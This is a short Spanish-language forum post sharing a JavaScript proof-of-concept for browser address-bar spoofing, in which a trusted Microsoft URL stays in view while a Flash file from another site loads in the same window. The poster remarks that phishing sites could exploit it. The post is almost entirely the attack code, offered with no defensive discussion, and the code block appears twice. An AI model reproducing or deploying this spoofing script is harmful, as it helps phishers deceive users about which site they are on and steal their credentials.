Este Script Lo encontre navegando por ahì. y me parecio interesante.
Abre una web Pero en la barra de direcciones aprece otra (en flash).
ESto puede ser aprovechado por sitios de phishing.
Código:
<script language="javascript">
function pause(ms)
{
date = new Date();
var curDate = null;
do { var curDate = new Date(); }
while(curDate-date < ms);
}
function spoof () {
win = window.open('http://www.microsoft.com/','new')
pause (2000)
win = window.open('http://www.buctuong.com/swfs/index.swf','new')
pause (2000)
win = window.open('http://www.microsoft.com/','new')
}
</script>
<a href="javascript: spoof()">P.O.F</a>
function pause(ms)
{
date = new Date();
var curDate = null;
do { var curDate = new Date(); }
while(curDate-date < ms);
}
function spoof () {
win = window.open('http://www.microsoft.com/','new')
pause (2000)
win = window.open('http://www.buctuong.com/swfs/index.swf','new')
pause (2000)
win = window.open('http://www.microsoft.com/','new')
}
</script>
<a href="javascript: spoof()">P.O.F</a>
Saludo.










Autor


En línea





